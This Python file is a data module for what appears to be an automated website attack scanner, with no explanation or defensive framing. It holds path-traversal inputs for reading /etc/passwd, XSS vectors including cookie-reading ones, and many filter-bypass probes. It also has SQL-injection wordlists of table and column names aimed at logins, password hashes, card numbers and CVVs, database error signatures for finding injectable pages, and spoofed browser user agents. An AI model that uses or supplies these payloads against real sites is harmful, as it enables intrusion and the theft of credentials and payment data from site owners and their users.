#!/usr/bin/python
# -*- coding: latin-1 -*-

lfis = ["/etc/passwd", "../etc/passwd", "../../etc/passwd", "../../../etc/passwd", "../../../../etc/passwd",
        "../../../../../etc/passwd", "../../../../../../etc/passwd", "../../../../../../../etc/passwd",
        "../../../../../../../../etc/passwd", "../../../../../../../../../etc/passwd",
        "../../../../../../../../../../etc/passwd", "/etc/passwd", "../etc/passwd", "../../etc/passwd",
        "../../../etc/passwd", "../../../../etc/passwd", "../../../../../etc/passwd", "../../../../../../etc/passwd",
        "../../../../../../../etc/passwd", "../../../../../../../../etc/passwd",
        "../../../../../../../../../etc/passwd", "../../../../../../../../../../etc/passwd", "/etc/passwd%00",
        "../etc/passwd%00", "../../etc/passwd%00", "../../../etc/passwd%00", "../../../../etc/passwd%00",
        "../../../../../etc/passwd%00", "../../../../../../etc/passwd%00", "../../../../../../../etc/passwd%00",
        "../../../../../../../../etc/passwd%00", "../../../../../../../../../etc/passwd%00",
        "../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../etc/passwd%00",
        "../../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../../../etc/passwd%00"]

xsses = ["""<IMG SRC=javascript:alert('Basic XSS Vuln Detected')>""",
         """<IMG SRC=JaVaScRiPt:alert('Case Sensitive XSS Vector')>""",
         """<a onmouseover=alert(document.cookie)>Malformed A Tag Attack Vuln</a>""",
         """<IMG SRC=javascript:alert(String.fromCharCode(88, 83, 83, 32, 86, 117, 108, 110, 32, 70, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 32, 102, 105, 108, 116, 101, 114, 32, 98, 121, 112, 97, 115, 115, 32, 100, 101, 116, 101, 99, 116, 101, 100))>""",
         """<IMG SRC=%55%54%46%38%20%55%6E%69%63%6F%64%65%20%58%53%53%20%56%75%6C%6E%20%44%65%74%65%63%74%65%64>""",
         """<BODY ONLOAD=alert('XSS Bodytag Vuln Detected')>""",
         """¼script¾alert(¢US-ASCII XSS Bypass Vuln Detected¢)¼/script¾""",
         """<IMG SRC=jav    ascript:alert('XSS Embedded Tab Vulnerability');>""",
         """<IMG SRC=%58%53%53%20%48%65%78%20%56%75%6C%6E%65%72%61%62%69%6C%69%74%79>""",
         """<IMG SRC=jav&#x09;ascript:alert('XSS Embedded Encoded Tab Vulnerability');>""",
         """<<SCRIPT>alert(XSS Extraneous Open Brackets Vulnerability);//<</SCRIPT>""",
         """<META HTTP-EQUIV=refresh CONTENT=0;url=data:text/html base64,WFNTIEJhc2UgNjQgRW5jb2RpbmcgQnlwYXNz""",
         """\;alert('XSS Javascript Escapes Vulnerability Detected');//""",
         """</TITLE><SCRIPT>alert(XSS End Title Tag Vulnerability Detected);</SCRIPT>""",
         """<STYLE>@im\port'\ja\vasc\riptt:alert(XSS Style Tags with Broken Javascript Vulnerability Detected)';</STYLE>""",
         """'';!--"-->'>"><OY1Py""",
	 """'';!--"-->'>">%3COY1Py""",
	 """'';!--"-->'>">&ltOY1Py""",
	 """'';!--"-->'>">&lt;OY1Py""",
	 """'';!--"-->'>">&LTOY1Py""",
	 """'';!--"-->'>">&LT;OY1Py""",
	 """'';!--"-->'>">&#60OY1Py""",
	 """'';!--"-->'>">&#060OY1Py""",
	 """'';!--"-->'>">&#0060OY1Py""",
	 """'';!--"-->'>">&#00060OY1Py""",
	 """'';!--"-->'>">&#000060OY1Py""",
	 """'';!--"-->'>">&#0000060OY1Py""",
	 """'';!--"-->'>">&#60;OY1Py""",
	 """'';!--"-->'>">&#060;OY1Py""",
	 """'';!--"-->'>">&#0060;OY1Py""",
	 """'';!--"-->'>">&#00060;OY1Py""",
	 """'';!--"-->'>">&#000060;OY1Py""",
	 """'';!--"-->'>">&#0000060;OY1Py""",
	 """'';!--"-->'>">&#x3cOY1Py""",
	 """'';!--"-->'>">&#x03cOY1Py""",
	 """'';!--"-->'>">&#x003cOY1Py""",
	 """'';!--"-->'>">&#x0003cOY1Py""",
	 """'';!--"-->'>">&#x00003cOY1Py""",
	 """'';!--"-->'>">&#x000003cOY1Py""",
	 """'';!--"-->'>">&#x3c;OY1Py""",
	 """'';!--"-->'>">&#x03c;OY1Py""",
	 """'';!--"-->'>">&#x003c;OY1Py""",
	 """'';!--"-->'>">&#x0003c;OY1Py""",
	 """'';!--"-->'>">&#x00003c;OY1Py""",
	 """'';!--"-->'>">&#x000003c;OY1Py""",
	 """'';!--"-->'>">&#X3cOY1Py""",
	 """'';!--"-->'>">&#X03cOY1Py""",
	 """'';!--"-->'>">&#X003cOY1Py""",
	 """'';!--"-->'>">&#X0003cOY1Py""",
	 """'';!--"-->'>">&#X00003cOY1Py""",
	 """'';!--"-->'>">&#X000003cOY1Py""",
	 """'';!--"-->'>">&#X3c;OY1Py""",
	 """'';!--"-->'>">&#X03c;OY1Py""",
	 """'';!--"-->'>">&#X003c;OY1Py""",
	 """'';!--"-->'>">&#X0003c;OY1Py""",
	 """'';!--"-->'>">&#X00003c;OY1Py""",
	 """'';!--"-->'>">&#X000003c;OY1Py""",
	 """'';!--"-->'>">&#x3COY1Py""",
	 """'';!--"-->'>">&#x03COY1Py""",
	 """'';!--"-->'>">&#x003COY1Py""",
	 """'';!--"-->'>">&#x0003COY1Py""",
	 """'';!--"-->'>">&#x00003COY1Py""",
	 """'';!--"-->'>">&#x000003COY1Py""",
	 """'';!--"-->'>">&#x3C;OY1Py""",
	 """'';!--"-->'>">&#x03C;OY1Py""",
	 """'';!--"-->'>">&#x003C;OY1Py""",
	 """'';!--"-->'>">&#x0003C;OY1Py""",
	 """'';!--"-->'>">&#x00003C;OY1Py""",
	 """'';!--"-->'>">&#x000003C;OY1Py""",
	 """'';!--"-->'>">&#X3COY1Py""",
	 """'';!--"-->'>">&#X03COY1Py""",
	 """'';!--"-->'>">&#X003COY1Py""",
	 """'';!--"-->'>">&#X0003COY1Py""",
	 """'';!--"-->'>">&#X00003COY1Py""",
	 """'';!--"-->'>">&#X000003COY1Py""",
	 """'';!--"-->'>">&#X3C;OY1Py""",
	 """'';!--"-->'>">&#X03C;OY1Py""",
	 """'';!--"-->'>">&#X003C;OY1Py""",
	 """'';!--"-->'>">&#X0003C;OY1Py""",
	 """'';!--"-->'>">&#X00003C;OY1Py""",
	 """'';!--"-->'>">&#X000003C;OY1Py""",
	 """'';!--"-->'>">\x3cOY1Py""",
	 """'';!--"-->'>">\x3COY1Py""",
	 """'';!--"-->'>">\u003cOY1Py""",
	 """'';!--"-->'>">\u003COY1Py""",
	 """'';!//'>;//">;//-->;//"//><<--'>--"><LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">%3CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&ltLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&lt;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&LTLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&LT;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#60LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#060LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#0060LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#00060LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#000060LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#0000060LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#60;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#060;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#0060;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#00060;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#000060;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#0000060;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x3cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x03cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x003cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x0003cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x00003cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x000003cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x3c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x03c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x003c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x0003c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x00003c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x000003c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X3cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X03cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X003cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X0003cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X00003cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X000003cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X3c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X03c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X003c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X0003c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X00003c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X000003c;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x3CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x03CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x003CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x0003CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x00003CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x000003CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x3C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x03C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x003C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x0003C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x00003C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#x000003C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X3CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X03CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X003CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X0003CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X00003CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X000003CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X3C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X03C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X003C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X0003C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X00003C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">&#X000003C;LOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">\x3cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">\x3CLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">\u003cLOY2PyTRurb1c""",
	 """'';!//'>;//">;//-->;//"//><<--'>--">\u003CLOY2PyTRurb1c"""]

tables = ['user', 'users', 'tbladmins', 'Logins', 'logins', 'login', 'admins', 'members', 'member', '_wfspro_admin',
          '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user',
          'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator',
          'administrators', 'adminrights', 'admins', 'adminuser', 'adminusers', 'article_admin', 'articles', 'artikel',
          'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages',
          'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content',
          'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer',
          'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members',
          'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings',
          'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'index', 'info', 'ipb.ibf_members',
          'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details',
          'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici',
          'kpro_adminlogs', 'kpro_user', 'links', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logon',
          'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session',
          'mambo_users', 'manage', 'manager', 'mb_users', 'memberlist', 'minibbtable_users', 'mitglieder', 'mybb_users',
          'mysql', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_users', 'obb_profiles', 'order',
          'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit',
          'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users',
          'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user',
          'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session',
          'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins',
          'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins',
          'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member',
          'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser',
          'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user_admin', 'user_info',
          'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins',
          'username', 'usernames', 'userrights', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members',
          'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'wp_users', 'x_admin', 'xar_roles',
          'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'Category', 'CategoryGroup',
          'ChicksPass', 'dtproperties', 'JamPass', 'News', 'Passwords by usage count', 'PerfPassword',
          'PerfPasswordAllSelected', 'pristup', 'SubCategory', 'tblRestrictedPasswords', 'Ticket System Acc Numbers',
          'Total Members', 'UserPreferences', 'tblConfigs', 'tblLogBookAuthor', 'tblLogBookUser', 'tblMails',
          'tblOrders', 'tblUser', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user',
          'table_user', 'email', 'mail', 'bulletin', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin',
          'Site_Login', 'UserAdmin']

columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd',
           'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass',
           'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user',
           'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id',
           'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name',
           'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id',
           'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi',
           'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik',
           'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass',
           'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w',
           'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword',
           'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname',
           'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username',
           'my_name', 'my_password', 'my_email', 'korisnicko', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts',
           'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth',
           'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname',
           'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt',
           'crack', 'customer', 'customers', 'cvvnumber', 'data', 'db_database_name', 'db_hostname', 'db_password',
           'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash',
           'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address',
           'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo',
           'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members',
           'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone',
           'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id',
           'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2',
           'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un',
           'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd',
           'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm',
           'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']

sqlerrors = {'MySQL': 'error in your SQL syntax',
             'MiscError': 'mysql_fetch',
             'MiscError2': 'num_rows',
             'Oracle': 'ORA-01756',
             'JDBC_CFM': 'Error Executing Database Query',
             'JDBC_CFM2': 'SQLServer JDBC Driver',
             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
             'MSSQL_Uqm': 'Unclosed quotation mark',
             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
             'MS-Access_JETdb': 'Microsoft JET Database',
             'Error Occurred While Processing Request': 'Error Occurred While Processing Request',
             'Server Error': 'Server Error',
             'Microsoft OLE DB Provider for ODBC Drivers error': 'Microsoft OLE DB Provider for ODBC Drivers error',
             'Invalid Querystring': 'Invalid Querystring',
             'OLE DB Provider for ODBC': 'OLE DB Provider for ODBC',
             'VBScript Runtime': 'VBScript Runtime',
             'ADODB.Field': 'ADODB.Field',
             'BOF or EOF': 'BOF or EOF',
             'ADODB.Command': 'ADODB.Command',
             'JET Database': 'JET Database',
             'mysql_fetch_array()': 'mysql_fetch_array()',
             'Syntax error': 'Syntax error',
             'mysql_numrows()': 'mysql_numrows()',
             'GetArray()': 'GetArray()',
             'FetchRow()': 'FetchRow()',
             'Input string was not in a correct format': 'Input string was not in a correct format'}

header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
          'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
          'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
          'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
          'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
          'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
          'Microsoft Internet Explorer/4.0b1 (Windows 95)',
          'Opera/8.00 (Windows NT 5.1; U; en)',
          'amaya/9.51 libwww/5.4.0',
          'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
          'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
          'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
          'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
          'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
          'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]',
          'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0',
          'Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920)',
          'Mozilla/5.0 (Series40; Nokia311/03.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.31',
          'Opera/8.01 (J2ME/MIDP; Opera Mini/3.0.6306/1528; en; U; ssr)',
          'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4',
          'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2',
          'Mozilla/5.0 (Windows; Windows i686) KHTML/4.8.0 (like Gecko) Konqueror/4.8 ',
          'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)',
          'Opera/9.80 <a> href="https://www.youtube.com/user/tiffanyalvord">Tiffany Alvord</a> (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60',
          'Opera/9.80 (BlackBerry; Opera Mini/6.5.27548/28.2075; U; en) Presto/2.8.119 Version/11.10']

search_ignore = ["google","youtube","phpbuddy","iranhack","phpbuilder","codingforums","phpfreaks","%","facebook","twitter","hackforums","askjeeves","wordpress","github","\(","<","\A/"]
